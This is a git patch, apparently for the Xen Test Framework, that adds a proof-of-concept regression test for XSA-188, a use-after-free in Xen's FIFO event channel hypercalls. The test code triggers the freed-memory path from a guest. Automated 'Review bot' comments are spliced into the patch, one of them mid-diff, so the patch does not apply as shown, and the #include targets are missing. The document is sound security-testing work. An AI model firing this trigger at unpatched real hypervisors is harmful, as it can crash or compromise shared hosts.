From cae076b200f2bb124e4eb0db8b86857fb80816dc Mon Sep 17 00:00:00 2001
From: David Vrabel
Date: Fri, 2 Sep 2016 13:39:36 +0100
Subject: [PATCH] XSA-188 PoC

Signed-off-by: David Vrabel
Reviewed-by: Andrew Cooper
---
 docs/all-tests.dox | 2 ++
 include/xen/event_channel.h | 17 +++++++++++
 tests/xsa-188/Makefile | 9 ++++++
 tests/xsa-188/main.c | 58 +++++++++++++++++++++++++++++++++++++
 4 files changed, 86 insertions(+)
 create mode 100644 tests/xsa-188/Makefile
 create mode 100644 tests/xsa-188/main.c

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 1b14c67..0af0cd7 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -39,6 +39,8 @@ Coveres XSA-106 and XSA-156. @subpage test-xsa-183 - x86: Missing SMAP whitelisting in 32-bit exception / event delivery.
+@subpage test-xsa-188 - use after free in FIFO event channel code.
+
 @section index-utility Utilities
diff --git a/include/xen/event_channel.h b/include/xen/event_channel.h
index 3754f9e..62ee95a 100644
--- a/include/xen/event_channel.h
+++ b/include/xen/event_channel.h
@@ -2,9 +2,26 @@ #define XEN_PUBLIC_EVENT_CHANNEL_H
 #define EVTCHNOP_send 4
+#define EVTCHNOP_init_control 11
+#define EVTCHNOP_expand_array 12
 typedef uint32_t evtchn_port_t;
+struct evtchn_init_control {
+ /* IN parameters. */
+ uint64_t control_gfn;
+ uint32_t offset;
+ uint32_t vcpu;
+ /* OUT parameters. */
+ uint8_t link_bits;
+ uint8_t _pad[7];
+};
+
+struct evtchn_expand_array {
+ /* IN parameters. */
+ uint64_t array_gfn;
+};
+
 #endif /* XEN_PUBLIC_EVENT_CHANNEL_H */
 /*
diff --git a/tests/xsa-188/Makefile b/tests/xsa-188/Makefile
new file mode 100644
index 0000000..de56394
--- /dev/null
+++ b/tests/xsa-188/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME := xsa-188
+CATEGORY := xsa
+TEST-ENVS := $(ALL_ENVIRONMENTS)
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-188/main.c b/tests/xsa-188/main.c
new file mode 100644
index 0000000..2f15cfd
--- /dev/null
+++ b/tests/xsa-188/main.c
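Review bot: The two new structs in include/xen/event_channel.h mirror a hypervisor ABI (the guard is XEN_PUBLIC_EVENT_CHANNEL_H), so their layout is dictated by the other side, yet nothing in the hunk says so and nothing pins the 24-byte size that `_pad[7]` exists to produce. I would add `/* Layout must match the hypervisor's public event_channel.h ABI byte for byte; do not reorder or resize. */` above `struct evtchn_init_control`, and, if this tree compiles as C11, `_Static_assert(sizeof(struct evtchn_init_control) == 24, "evtchn_init_control ABI size");` after its closing brace, with the matching `== 8` check for `struct evtchn_expand_array`. The sizes follow from the visible field types under natural alignment (8 + 4 + 4 + 1 + 7 and 8); the opcode values 11 and 12 are taken as given here.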
@@ -0,0 +1,58 @@
+/**
+ * @file tests/xsa-188/main.c
+ * @ref test-xsa-188
+ *
+ * @page test-xsa-188 XSA-188
+ *
+ * Advisory: [XSA-188](http://xenbits.xen.org/xsa/advisory-188.html)
+ *
+ * EVTCHNOP_init_control with an invalid control_gfn will correctly
+ * fail and free resources but incorrectly leaves a pointer to freed
+ * memory.
+ *
+ * A subsequent EVTCHNOP_expand_array call (for example) will use this
+ * freed memory.
+ *
+ * @see tests/xsa-188/main.c
+ */
+#include
+#include
+
+static uint8_t array_page[PAGE_SIZE] __aligned(PAGE_SIZE);
+
+void test_main(void)
+{
+ struct evtchn_init_control init_control;
+ struct evtchn_expand_array expand_array;
+ int ret;
+
+ printk("XSA-188 PoC\n");
+
+ /* 1. EVTCHNOP_init_control with bad GFN. */
+ init_control.control_gfn = (uint64_t)-2;
+ init_control.offset = 0;
+ init_control.vcpu = 0;
+
+ ret = hypercall_event_channel_op(EVTCHNOP_init_control, &init_control);
+ if ( ret != -EINVAL )
+ xtf_failure("EVTCHNOP_init_control returned %d (!= %d)\n", ret, -EINVAL);
+
+ /* 2. EVTCHNOP_expand_array. */
+ expand_array.array_gfn = virt_to_gfn(array_page);
+
+ ret = hypercall_event_channel_op(EVTCHNOP_expand_array, &expand_array);
+ if ( ret != -ENOSYS )
+ xtf_failure("EVTCHNOP_expand_array returned %d (!= %d)\n", ret, -ENOSYS);
+
+ xtf_success(NULL);
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
-- 2.39.5
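Review bot: `init_control` and `expand_array` are declared uninitialised in test_main and only the IN fields are assigned before the whole object is handed to the hypervisor, so `link_bits` and `_pad` go across as stack garbage; designated initialisers make both objects fully defined and replace the three separate field stores: `struct evtchn_init_control init_control = { .control_gfn = (uint64_t)-2 };` and `struct evtchn_expand_array expand_array = { .array_gfn = virt_to_gfn(array_page) };` (`.offset` and `.vcpu` become zero by initialisation). Step 2 also deserves a why-comment, because `-ENOSYS` is an unusual pass criterion; something like `/* 2. EVTCHNOP_expand_array: a fixed hypervisor has no FIFO state left after the failed init_control and must refuse this with -ENOSYS instead of touching freed memory. */` — the reason is inferred from the file comment above, not shown by the code itself, so confirm it against the advisory before committing to the wording. Finally, the test keeps running after the first `xtf_failure()` and reaches `xtf_success(NULL)` on every path; whether the reporting layer retains the earlier failure is not visible in this hunk, so an explicit `return;` after the first check would make the intended outcome unambiguous.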